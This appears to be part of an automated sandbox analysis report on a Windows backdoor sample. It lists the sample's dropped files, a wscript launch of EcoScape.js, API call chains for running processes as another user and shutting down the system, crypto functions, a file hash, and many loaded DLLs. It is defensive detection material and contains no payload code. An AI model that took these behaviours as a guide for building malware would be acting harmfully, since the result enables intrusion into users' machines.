Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

11_2_004B4763

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

11_2_004A1B4D

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_004AF20D

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00468017	11_2_00468017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045E144	11_2_0045E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0044E1F0	11_2_0044E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047A26E	11_2_0047A26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004622A2	11_2_004622A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004422AD	11_2_004422AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045C624	11_2_0045C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047E87F	11_2_0047E87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004CC8A4	11_2_004CC8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B2A05	11_2_004B2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00476ADE	11_2_00476ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A8BFF	11_2_004A8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045CD7A	11_2_0045CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0046CE10	11_2_0046CE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00477159	11_2_00477159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449240	11_2_00449240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D5311	11_2_004D5311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004496E0	11_2_004496E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461704	11_2_00461704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461A76	11_2_00461A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00449B60	11_2_00449B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467B8B	11_2_00467B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461D20	11_2_00461D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00467DBA	11_2_00467DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00461FE7	11_2_00461FE7

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 00460DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: String function: 0045FD52 appears 40 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068

PE / OLE file has an invalid certificate

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: invalid certificate

PE file does not import any functions

Source: Northeast.0.dr

Static PE information: No import functions for PE file found

PE file overlay found

Source: Northeast.0.dr

Static PE information: Data appended to the last section found

Tries to load missing DLLs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
